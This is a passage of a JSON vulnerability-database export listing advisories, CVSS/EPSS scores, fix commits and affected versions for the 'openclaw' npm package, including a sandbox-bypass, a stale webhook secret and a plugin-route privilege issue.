                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42427",
                "GHSA-7437-7hg8-frrw"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3zwq-dz2u-pqgv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90172?format=api",
            "vulnerability_id": "VCID-3zx4-t8cj-kbfn",
            "summary": "OpenClaw: Heartbeat context inheritance bypasses sandbox via senderIsOwner escalation\n## Summary\nHeartbeat context inheritance bypasses sandbox via senderIsOwner escalation\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: Critical\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a30214a624946fc5c85c9558a27c1580172374fd` — 2026-03-31T09:06:51+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41329",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15986",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1603",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1604",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41329"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a30214a624946fc5c85c9558a27c1580172374fd",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "9.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a30214a624946fc5c85c9558a27c1580172374fd"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g5cg-8x5w-7jpm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "9.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g5cg-8x5w-7jpm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41329",
                    "reference_id": "CVE-2026-41329",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41329"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-g5cg-8x5w-7jpm",
                    "reference_id": "GHSA-g5cg-8x5w-7jpm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-g5cg-8x5w-7jpm"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation",
                    "reference_id": "openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T19:38:10Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-sandbox-bypass-via-heartbeat-context-inheritance-and-senderisowner-escalation"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41329",
                "GHSA-g5cg-8x5w-7jpm"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3zx4-t8cj-kbfn"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95449?format=api",
            "vulnerability_id": "VCID-4316-7q9a-xuhx",
            "summary": "OpenClaw's Webhooks SecretRef route secret remains valid after rotation/reload\n## Summary\n\nOpenClaw webhooks allowed route secrets to be backed by `SecretRef` values, but cached the resolved secret for a route. After an operator rotated the underlying secret and ran `openclaw secrets reload`, the previous resolved webhook secret could remain valid until the plugin or gateway restarted.\n\n## Impact\n\nAn attacker who already had a previously valid webhook route secret could continue authenticating webhook requests after the operator rotated the secret and reloaded secrets. This weakened credential rotation for webhook routes and could allow continued invocation of the configured webhook task flow until restart.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nWebhook route authentication now resolves `SecretRef`-backed route secrets on each request. A rotated secret becomes effective after `openclaw secrets reload` without requiring a gateway or plugin restart, and the old secret is rejected.\n\n## Fix Commit(s)\n\n- `36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa` (`fix(webhooks): reload route secrets per request`)\n\n## Severity\n\nSeverity remains `medium`. The attack requires possession of a previously valid route secret, but the stale credential can continue to authorize webhook actions after rotation.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45005",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17844",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17878",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17882",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45005"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q8ff-7ffm-m3r9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q8ff-7ffm-m3r9"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45005",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45005"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-route-secret-cache-not-invalidated-after-rotation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:L"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-12T16:10:40Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-webhook-route-secret-cache-not-invalidated-after-rotation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-q8ff-7ffm-m3r9",
                    "reference_id": "GHSA-q8ff-7ffm-m3r9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-q8ff-7ffm-m3r9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/114733?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.23",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23"
                }
            ],
            "aliases": [
                "CVE-2026-45005",
                "GHSA-q8ff-7ffm-m3r9"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4316-7q9a-xuhx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89638?format=api",
            "vulnerability_id": "VCID-4hz5-f2pw-3yb4",
            "summary": "OpenClaw: Unauthenticated plugin-auth HTTP routes receive operator runtime scopes\n## Summary\nUnauthenticated plugin-auth HTTP routes receive operator runtime scopes\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still gives auth:\"plugin\" routes operator WRITE_SCOPE, but impact should stay limited to plugin routes that actually touch privileged runtime actions before plugin auth completes.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2a1db0c0f1fa375004a95ba0ef030534790a6d47` — 2026-04-01T00:20:49+09:00\n\nOpenClaw thanks @davidluzsilva for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41394",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00098",
                            "scoring_system": "epss",
                            "scoring_elements": "0.26999",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00098",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27037",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00098",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27045",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41394"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/2a1db0c0f1fa375004a95ba0ef030534790a6d47",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:51:37Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/2a1db0c0f1fa375004a95ba0ef030534790a6d47"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mhgq-xpfq-6r66",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
